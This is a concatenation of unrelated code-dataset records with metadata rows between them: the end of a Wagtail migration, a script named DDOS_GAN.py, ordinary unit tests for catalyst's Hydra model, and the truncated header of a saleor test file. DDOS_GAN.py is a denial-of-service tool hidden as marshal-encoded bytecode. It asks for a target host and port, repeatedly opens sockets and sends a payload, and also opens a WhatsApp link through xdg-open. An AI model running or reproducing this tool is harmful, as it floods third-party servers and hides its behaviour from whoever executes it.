Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], blank=True, null=True),
),
]
| 4,624.205882
| 78,219
| 0.738461
| 19,987
| 157,223
| 5.710962
| 0.017361
| 0.117377
| 0.180954
| 0.117535
| 0.995979
| 0.995401
| 0.995401
| 0.995401
| 0.995401
| 0.995401
| 0
| 0.013382
| 0.056983
| 157,223
| 33
| 78,220
| 4,764.333333
| 0.756495
| 0.000293
| 0
| 0.296296
| 1
| 0.592593
| 0.358479
| 0.047202
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.407407
| 0
| 0.518519
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
869997e3b77c9d5acacc7f02c3d9ca26ecfeb342
| 4,924
|
py
|
Python
|
DDOS_GAN.py
|
lildwagz/DDOS
|
f6dd8682032bd9a272cbd9a9db6454832970f2a4
|
[
"Apache-2.0"
] | null | null | null |
DDOS_GAN.py
|
lildwagz/DDOS
|
f6dd8682032bd9a272cbd9a9db6454832970f2a4
|
[
"Apache-2.0"
] | null | null | null |
DDOS_GAN.py
|
lildwagz/DDOS
|
f6dd8682032bd9a272cbd9a9db6454832970f2a4
|
[
"Apache-2.0"
] | 1
|
2021-01-26T13:49:53.000Z
|
2021-01-26T13:49:53.000Z
|
#Compiled By xNot_Found
#Github : https://github.com/hatakecnk
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00sS\x01\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00e\x01\x00j\x05\x00d\x02\x00\x83\x01\x00\x01e\x01\x00j\x05\x00d\x03\x00\x83\x01\x00\x01d\x04\x00Z\x06\x00e\x06\x00GHd\x05\x00\x84\x00\x00Z\x07\x00e\x01\x00j\x08\x00\x83\x00\x00Z\t\x00d\x06\x00GHe\n\x00d\x07\x00\x83\x01\x00Z\x0b\x00d\x08\x00GHe\x0c\x00d\x07\x00\x83\x01\x00Z\r\x00d\t\x00Z\x0e\x00e\x04\x00j\x0f\x00e\x0b\x00\x83\x01\x00Z\x10\x00d\n\x00e\x0b\x00\x17d\x0b\x00\x17GHd\x0c\x00e\x10\x00\x17d\x0b\x00\x17GHd\r\x00Z\x11\x00d\x0e\x00GHd\x0f\x00\x84\x00\x00Z\x12\x00x\x1e\x00e\x13\x00d\x10\x00e\x0e\x00\x83\x02\x00D]\r\x00Z\x14\x00e\x12\x00\x83\x00\x00\x01q\xeb\x00Wd\x11\x00GHe\x15\x00d\x12\x00k\x02\x00rO\x01e\n\x00d\x13\x00\x83\x01\x00Z\x16\x00e\x16\x00j\x17\x00\x83\x00\x00d\x14\x00j\x18\x00\x83\x00\x00k\x06\x00r;\x01e\x07\x00\x83\x00\x00\x01qO\x01e\x01\x00j\x05\x00e\t\x00d\x15\x00\x17\x83\x01\x00\x01n\x00\x00d\x01\x00S(\x16\x00\x00\x00i\xff\xff\xff\xffNt\x05\x00\x00\x00clearsf\x00\x00\x00xdg-open https://api.whatsapp.com/send?phone=62895332579555text=Halo%20Admin%20please%20konfirmasi.coms\x01\x01\x00\x00\n\x1b[1;96m|#########################################|\n\x1b[1;96m|###| Author : lil_dwagz |###| \n\x1b[1;96m|###| IG : lil_dwagz |###|\n\x1b[1;96m|###| Team : IES_ATTACKERS 
|###|\n\x1b[1;96m|#########################################|\nc\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s#\x00\x00\x00t\x00\x00j\x01\x00}\x00\x00t\x02\x00j\x03\x00|\x00\x00|\x00\x00t\x00\x00j\x04\x00\x8c\x02\x00\x01d\x00\x00S(\x01\x00\x00\x00N(\x05\x00\x00\x00t\x03\x00\x00\x00syst\n\x00\x00\x00executablet\x02\x00\x00\x00ost\x05\x00\x00\x00execlt\x04\x00\x00\x00argv(\x01\x00\x00\x00t\x06\x00\x00\x00python(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x0f\x00\x00\x00restart_program\x11\x00\x00\x00s\x04\x00\x00\x00\x00\x01\t\x01s3\x00\x00\x00\x1b[1;91minput web url \x1b[1;95m[ex : www.Example.com ]s\x14\x00\x00\x00\x1b[1;94mLIL_DWAGZ$ : s%\x00\x00\x00\x1b[1;91minput port \x1b[1;95m[ex : 8080 ]iP\xc3\x00\x00s\x1a\x00\x00\x00\x1b[1;91m Attacking \x1b[1;93m[t\x01\x00\x00\x00]s\x1d\x00\x00\x00\x1b[1;91m Attack to ip \x1b[1;93m[s1\x00\x00\x00ANONYMOUS AND INDONESIAN ERROR SYSTEM WAS HERE...s.\x00\x00\x00\x1b[1;91mATTACKING..............................c\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x00\x00t\x00\x00j\x01\x00t\x00\x00j\x02\x00\x83\x02\x00}\x00\x00yG\x00|\x00\x00j\x03\x00t\x04\x00d\x01\x00f\x02\x00\x83\x01\x00\x01|\x00\x00j\x05\x00t\x06\x00\x83\x01\x00\x01|\x00\x00j\x07\x00t\x06\x00t\x08\x00t\t\x00f\x02\x00\x83\x02\x00\x01|\x00\x00j\x05\x00t\x06\x00\x83\x01\x00\x01Wn#\x00\x04t\x00\x00j\n\x00k\n\x00r\x84\x00\x01}\x01\x00\x01d\x02\x00t\x08\x00\x17d\x03\x00\x17GHn\x01\x00Xd\x04\x00t\x08\x00\x17d\x03\x00\x17GH|\x00\x00j\x0b\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NiP\x00\x00\x00s\x1d\x00\x00\x00\x1b[1;91m ...no connection to [s\x05\x00\x00\x00] ...s(\x00\x00\x00\x1b[1;92m ...start sending the coffin to 
[(\x0c\x00\x00\x00t\x06\x00\x00\x00sockett\x07\x00\x00\x00AF_INETt\x0b\x00\x00\x00SOCK_STREAMt\x07\x00\x00\x00connectt\x04\x00\x00\x00hostt\x04\x00\x00\x00sendt\x07\x00\x00\x00messaget\x06\x00\x00\x00sendtot\x02\x00\x00\x00ipt\x04\x00\x00\x00portt\x05\x00\x00\x00errort\x05\x00\x00\x00close(\x02\x00\x00\x00t\x04\x00\x00\x00ddost\x03\x00\x00\x00msg(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x03\x00\x00\x00dos\x1f\x00\x00\x00s\x14\x00\x00\x00\x00\x02\x18\x01\x03\x01\x13\x01\r\x01\x16\x01\x11\x01\x12\x01\x11\x01\r\x01i\x01\x00\x00\x00s!\x00\x00\x00Ddos anda telah berhenti.........t\x08\x00\x00\x00__main__s3\x00\x00\x00Anda mau lanjut ddos ??? ketik fire untuk lanjut...s\x0e\x00\x00\x00y Y fire FIREs\n\x00\x00\x00Deqmain.py(\x19\x00\x00\x00t\x04\x00\x00\x00timeR\x03\x00\x00\x00R\x01\x00\x00\x00t\x06\x00\x00\x00stringR\t\x00\x00\x00t\x06\x00\x00\x00systemt\x05\x00\x00\x00banerR\x07\x00\x00\x00t\x06\x00\x00\x00getcwdt\x06\x00\x00\x00curdirt\t\x00\x00\x00raw_inputR\r\x00\x00\x00t\x05\x00\x00\x00inputR\x12\x00\x00\x00R\x0c\x00\x00\x00t\r\x00\x00\x00gethostbynameR\x11\x00\x00\x00R\x0f\x00\x00\x00R\x17\x00\x00\x00t\x05\x00\x00\x00ranget\x01\x00\x00\x00it\x08\x00\x00\x00__name__t\x06\x00\x00\x00answert\x05\x00\x00\x00stript\x05\x00\x00\x00split(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s:\x00\x00\x00\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\r\x01\r\x07\x06\x01\x05\x01\t\x03\x0c\x01\x05\x01\x0c\x01\x05\x01\x0c\x01\x06\x01\x0f\x01\r\x01\r\x01\x06\x01\x05\x01\t\x0c\x16\x01\x0b\x01\x05\x01\x0c\x01\x0c\x01\x18\x01\n\x02'))
| 1,231
| 4,846
| 0.734768
| 1,033
| 4,924
| 3.485963
| 0.197483
| 0.274924
| 0.14246
| 0.093307
| 0.339906
| 0.224938
| 0.101638
| 0.073591
| 0.058595
| 0.058595
| 0
| 0.359459
| 0.023152
| 4,924
| 4
| 4,846
| 1,231
| 0.389189
| 0.011982
| 0
| 0
| 0
| 0.5
| 0.991571
| 0.875206
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
86d4fec0602c2a0dc8b4453d08c52743a2735e02
| 24,993
|
py
|
Python
|
tests/catalyst/contrib/models/test_hydra.py
|
stjordanis/catalyst-1
|
93eedf0b9520bf1f83f63b13d6818df2a1e85b33
|
[
"Apache-2.0"
] | 4
|
2019-12-14T07:27:09.000Z
|
2021-03-23T14:34:37.000Z
|
tests/catalyst/contrib/models/test_hydra.py
|
Ran485/catalyst
|
84bc7576c981278f389279d87dda85dd66a758b6
|
[
"Apache-2.0"
] | null | null | null |
tests/catalyst/contrib/models/test_hydra.py
|
Ran485/catalyst
|
84bc7576c981278f389279d87dda85dd66a758b6
|
[
"Apache-2.0"
] | null | null | null |
from collections import OrderedDict
import copy
from pathlib import Path
import pytest
import torch
from torch import nn
from catalyst import utils
from catalyst.contrib.models import Hydra, SequentialNet
from catalyst.contrib.nn.modules import Normalize
def _pop_normalization(dct):
for values in dct.values():
if isinstance(values, dict):
values.pop("normalize_output", None)
_pop_normalization(values)
def _check_lists(left, right):
assert sorted(left) == sorted(right)
def _check_named_parameters(left, right):
    """Assert that two modules register exactly the same parameter names."""
    names_left = dict(left.named_parameters()).keys()
    names_right = dict(right.named_parameters()).keys()
    _check_lists(names_left, names_right)
def test_config1():
    """Hydra from an inline dict config: encoder + nested heads + embedders.

    Builds the expected network by hand from the same config (after removing
    the ``normalize_output`` flags and prepending the encoder width to each
    head's hiddens), then compares parameter names, the keys produced by
    ``forward()`` with/without targets, and the ``forward_tuple()`` output.
    """
    config1 = {
        "encoder_params": {
            "hiddens": [16, 16],
            "layer_fn": {"module": "Linear", "bias": False},
            "norm_fn": "LayerNorm",
        },
        "heads_params": {
            "head1": {"hiddens": [2], "layer_fn": {"module": "Linear", "bias": True}},
            "_head2": {
                "_hidden": {"hiddens": [16], "layer_fn": {"module": "Linear", "bias": False}},
                "head2_1": {
                    "hiddens": [32],
                    "layer_fn": {"module": "Linear", "bias": True},
                    "normalize_output": True,
                },
                "_head2_2": {
                    "_hidden": {
                        "hiddens": [16, 16, 16],
                        "layer_fn": {"module": "Linear", "bias": False},
                    },
                    "head2_2_1": {
                        "hiddens": [32],
                        "layer_fn": {"module": "Linear", "bias": True},
                        "normalize_output": False,
                    },
                },
            },
        },
        "embedders_params": {
            "target1": {"num_embeddings": 2, "normalize_output": True},
            "target2": {"num_embeddings": 2, "normalize_output": False},
        },
    }
    hydra = Hydra.get_from_params(**config1)
    # The reference net is built from a copy with "normalize_output" removed:
    # Hydra consumes those flags itself (they become Normalize modules below).
    config1_copy = copy.deepcopy(config1)
    _pop_normalization(config1_copy)
    encoder_params = config1_copy["encoder_params"]
    heads_params = config1_copy["heads_params"]
    # The reference heads get the 16-wide input size prepended so their layer
    # shapes match what Hydra constructs from the encoder output.
    heads_params["head1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
    # Hand-built reference network mirroring what Hydra should construct.
    net = nn.ModuleDict(
        {
            "encoder": SequentialNet(**encoder_params),
            "embedders": nn.ModuleDict(
                {
                    # "normalize_output": True -> trailing Normalize module
                    "target1": nn.Sequential(
                        OrderedDict(
                            [
                                ("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2)),
                                ("normalize", Normalize()),
                            ]
                        )
                    ),
                    "target2": nn.Sequential(
                        OrderedDict(
                            [("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2))]
                        )
                    ),
                }
            ),
            "heads": nn.ModuleDict(
                {
                    "head1": nn.Sequential(
                        OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
                    ),
                    "_head2": nn.ModuleDict(
                        {
                            "_hidden": nn.Sequential(
                                OrderedDict(
                                    [("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
                                )
                            ),
                            "head2_1": nn.Sequential(
                                OrderedDict(
                                    [
                                        (
                                            "net",
                                            SequentialNet(**heads_params["_head2"]["head2_1"]),
                                        ),
                                        ("normalize", Normalize()),
                                    ]
                                )
                            ),
                            "_head2_2": nn.ModuleDict(
                                {
                                    "_hidden": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "_hidden"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                    "head2_2_1": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "head2_2_1"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                }
                            ),
                        }
                    ),
                }
            ),
        }
    )
    _check_named_parameters(hydra.encoder, net["encoder"])
    _check_named_parameters(hydra.heads, net["heads"])
    _check_named_parameters(hydra.embedders, net["embedders"])
    # Forward pass: the input tensor comes back under "features" unchanged.
    input_ = torch.rand(1, 16)
    output_kv = hydra(input_)
    assert (input_ == output_kv["features"]).sum().item() == 16
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    # Supplying a target adds the corresponding "<target>_embeddings" key.
    output_kv = hydra(input_, target1=torch.ones(1, 2).long())
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
        "target1_embeddings",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    output_kv = hydra(input_, target2=torch.ones(1, 2).long())
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
        "target2_embeddings",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
        "target1_embeddings",
        "target2_embeddings",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    # Tuple API: 5 elements; first two match the kv "features"/"embeddings".
    output_tuple = hydra.forward_tuple(input_)
    assert len(output_tuple) == 5
    assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
    assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
def test_config2():
    """Hydra without encoder/embedders: ``in_features`` plus heads only.

    The encoder should degenerate to an identity (``nn.Sequential()``),
    ``embedders`` should be empty, and passing any ``target*`` keyword to
    ``forward()`` must raise ``KeyError``.
    """
    config2 = {
        "in_features": 16,
        "heads_params": {
            "head1": {"hiddens": [2], "layer_fn": {"module": "Linear", "bias": True}},
            "_head2": {
                "_hidden": {"hiddens": [16], "layer_fn": {"module": "Linear", "bias": False}},
                "head2_1": {
                    "hiddens": [32],
                    "layer_fn": {"module": "Linear", "bias": True},
                    "normalize_output": True,
                },
                "_head2_2": {
                    "_hidden": {
                        "hiddens": [16, 16, 16],
                        "layer_fn": {"module": "Linear", "bias": False},
                    },
                    "head2_2_1": {
                        "hiddens": [32],
                        "layer_fn": {"module": "Linear", "bias": True},
                        "normalize_output": False,
                    },
                },
            },
        },
    }
    hydra = Hydra.get_from_params(**config2)
    # Reference net from a copy with "normalize_output" flags removed.
    config2_copy = copy.deepcopy(config2)
    _pop_normalization(config2_copy)
    heads_params = config2_copy["heads_params"]
    # Prepend the 16-wide input size so reference head shapes match Hydra's.
    heads_params["head1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
    net = nn.ModuleDict(
        {
            # No encoder_params -> identity encoder with no parameters.
            "encoder": nn.Sequential(),
            "heads": nn.ModuleDict(
                {
                    "head1": nn.Sequential(
                        OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
                    ),
                    "_head2": nn.ModuleDict(
                        {
                            "_hidden": nn.Sequential(
                                OrderedDict(
                                    [("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
                                )
                            ),
                            "head2_1": nn.Sequential(
                                OrderedDict(
                                    [
                                        (
                                            "net",
                                            SequentialNet(**heads_params["_head2"]["head2_1"]),
                                        ),
                                        ("normalize", Normalize()),
                                    ]
                                )
                            ),
                            "_head2_2": nn.ModuleDict(
                                {
                                    "_hidden": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "_hidden"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                    "head2_2_1": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "head2_2_1"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                }
                            ),
                        }
                    ),
                }
            ),
        }
    )
    _check_named_parameters(hydra.encoder, net["encoder"])
    _check_named_parameters(hydra.heads, net["heads"])
    assert hydra.embedders == {}
    # With an identity encoder, both "features" and "embeddings" echo input.
    input_ = torch.rand(1, 16)
    output_kv = hydra(input_)
    assert (input_ == output_kv["features"]).sum().item() == 16
    assert (input_ == output_kv["embeddings"]).sum().item() == 16
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    # No embedders configured, so any target keyword must raise KeyError.
    with pytest.raises(KeyError):
        output_kv = hydra(input_, target1=torch.ones(1, 2).long())
    with pytest.raises(KeyError):
        output_kv = hydra(input_, target2=torch.ones(1, 2).long())
    with pytest.raises(KeyError):
        output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
    # output_kv still holds the earlier successful (target-free) result here,
    # since the assignments above raised before rebinding it.
    output_tuple = hydra.forward_tuple(input_)
    assert len(output_tuple) == 5
    assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
    assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
def test_config3():
    """Same checks as ``test_config1`` with the config loaded from YAML.

    Reads ``config3.yml`` (next to this file) via ``utils.load_config`` and
    verifies that a YAML-sourced config builds the identical network.
    """
    config_path = Path(__file__).absolute().parent / "config3.yml"
    config3 = utils.load_config(config_path)["model_params"]
    hydra = Hydra.get_from_params(**config3)
    # Reference net from a copy with "normalize_output" flags removed.
    config3_copy = copy.deepcopy(config3)
    _pop_normalization(config3_copy)
    encoder_params = config3_copy["encoder_params"]
    heads_params = config3_copy["heads_params"]
    # Prepend the 16-wide encoder output so reference heads match Hydra's.
    heads_params["head1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
    # Hand-built reference network mirroring what Hydra should construct.
    net = nn.ModuleDict(
        {
            "encoder": SequentialNet(**encoder_params),
            "embedders": nn.ModuleDict(
                {
                    # "normalize_output": True -> trailing Normalize module
                    "target1": nn.Sequential(
                        OrderedDict(
                            [
                                ("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2)),
                                ("normalize", Normalize()),
                            ]
                        )
                    ),
                    "target2": nn.Sequential(
                        OrderedDict(
                            [("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2))]
                        )
                    ),
                }
            ),
            "heads": nn.ModuleDict(
                {
                    "head1": nn.Sequential(
                        OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
                    ),
                    "_head2": nn.ModuleDict(
                        {
                            "_hidden": nn.Sequential(
                                OrderedDict(
                                    [("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
                                )
                            ),
                            "head2_1": nn.Sequential(
                                OrderedDict(
                                    [
                                        (
                                            "net",
                                            SequentialNet(**heads_params["_head2"]["head2_1"]),
                                        ),
                                        ("normalize", Normalize()),
                                    ]
                                )
                            ),
                            "_head2_2": nn.ModuleDict(
                                {
                                    "_hidden": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "_hidden"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                    "head2_2_1": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "head2_2_1"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                }
                            ),
                        }
                    ),
                }
            ),
        }
    )
    _check_named_parameters(hydra.encoder, net["encoder"])
    _check_named_parameters(hydra.heads, net["heads"])
    _check_named_parameters(hydra.embedders, net["embedders"])
    # Forward pass: the input tensor comes back under "features" unchanged.
    input_ = torch.rand(1, 16)
    output_kv = hydra(input_)
    assert (input_ == output_kv["features"]).sum().item() == 16
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    # Supplying a target adds the corresponding "<target>_embeddings" key.
    output_kv = hydra(input_, target1=torch.ones(1, 2).long())
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
        "target1_embeddings",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    output_kv = hydra(input_, target2=torch.ones(1, 2).long())
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
        "target2_embeddings",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
        "target1_embeddings",
        "target2_embeddings",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    # Tuple API: 5 elements; first two match the kv "features"/"embeddings".
    output_tuple = hydra.forward_tuple(input_)
    assert len(output_tuple) == 5
    assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
    assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
def test_config4():
    """YAML config missing the input size: creation must fail until fixed.

    ``Hydra.get_from_params`` raises ``AssertionError`` for ``config4.yml``
    as loaded; once ``in_features`` is supplied the model behaves exactly
    like the heads-only model of ``test_config2``.
    """
    config_path = Path(__file__).absolute().parent / "config4.yml"
    config4 = utils.load_config(config_path)["model_params"]
    with pytest.raises(AssertionError):
        hydra = Hydra.get_from_params(**config4)
    # Supplying the input width makes the config valid.
    config4["in_features"] = 16
    hydra = Hydra.get_from_params(**config4)
    # Reference net from a copy with "normalize_output" flags removed.
    config4_copy = copy.deepcopy(config4)
    _pop_normalization(config4_copy)
    heads_params = config4_copy["heads_params"]
    # Prepend the 16-wide input size so reference head shapes match Hydra's.
    heads_params["head1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
    heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
    net = nn.ModuleDict(
        {
            # No encoder_params -> identity encoder with no parameters.
            "encoder": nn.Sequential(),
            "heads": nn.ModuleDict(
                {
                    "head1": nn.Sequential(
                        OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
                    ),
                    "_head2": nn.ModuleDict(
                        {
                            "_hidden": nn.Sequential(
                                OrderedDict(
                                    [("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
                                )
                            ),
                            "head2_1": nn.Sequential(
                                OrderedDict(
                                    [
                                        (
                                            "net",
                                            SequentialNet(**heads_params["_head2"]["head2_1"]),
                                        ),
                                        ("normalize", Normalize()),
                                    ]
                                )
                            ),
                            "_head2_2": nn.ModuleDict(
                                {
                                    "_hidden": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "_hidden"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                    "head2_2_1": nn.Sequential(
                                        OrderedDict(
                                            [
                                                (
                                                    "net",
                                                    SequentialNet(
                                                        **heads_params["_head2"]["_head2_2"][
                                                            "head2_2_1"
                                                        ]
                                                    ),
                                                )
                                            ]
                                        )
                                    ),
                                }
                            ),
                        }
                    ),
                }
            ),
        }
    )
    _check_named_parameters(hydra.encoder, net["encoder"])
    _check_named_parameters(hydra.heads, net["heads"])
    assert hydra.embedders == {}
    # With an identity encoder, both "features" and "embeddings" echo input.
    input_ = torch.rand(1, 16)
    output_kv = hydra(input_)
    assert (input_ == output_kv["features"]).sum().item() == 16
    assert (input_ == output_kv["embeddings"]).sum().item() == 16
    kv_keys = [
        "features",
        "embeddings",
        "head1",
        "_head2/",
        "_head2/head2_1",
        "_head2/_head2_2/",
        "_head2/_head2_2/head2_2_1",
    ]
    _check_lists(output_kv.keys(), kv_keys)
    # No embedders configured, so any target keyword must raise KeyError.
    with pytest.raises(KeyError):
        output_kv = hydra(input_, target1=torch.ones(1, 2).long())
    with pytest.raises(KeyError):
        output_kv = hydra(input_, target2=torch.ones(1, 2).long())
    with pytest.raises(KeyError):
        output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
    # output_kv still holds the earlier successful (target-free) result here,
    # since the assignments above raised before rebinding it.
    output_tuple = hydra.forward_tuple(input_)
    assert len(output_tuple) == 5
    assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
    assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
| 38.869362
| 99
| 0.362261
| 1,698
| 24,993
| 4.985866
| 0.062426
| 0.046775
| 0.046775
| 0.052918
| 0.876093
| 0.854831
| 0.854831
| 0.837586
| 0.82601
| 0.82601
| 0
| 0.047136
| 0.522946
| 24,993
| 642
| 100
| 38.929907
| 0.66292
| 0.006042
| 0
| 0.661538
| 0
| 0
| 0.127755
| 0.010072
| 0
| 0
| 0
| 0.001558
| 0.037607
| 1
| 0.011966
| false
| 0
| 0.015385
| 0
| 0.02735
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
810c9506a70230f83d7101fa0e58658daef41b22
| 78,300
|
py
|
Python
|
tests/api/test_meta_queries.py
|
sebasgoldberg/saleor
|
2e94e8df80f305889434f549a4da6abc1257b598
|
[
"CC-BY-4.0"
] | 4
|
2021-04-09T01:07:00.000Z
|
2022-02-15T10:51:39.000Z
|
tests/api/test_meta_queries.py
|
sebasgoldberg/saleor
|
2e94e8df80f305889434f549a4da6abc1257b598
|
[
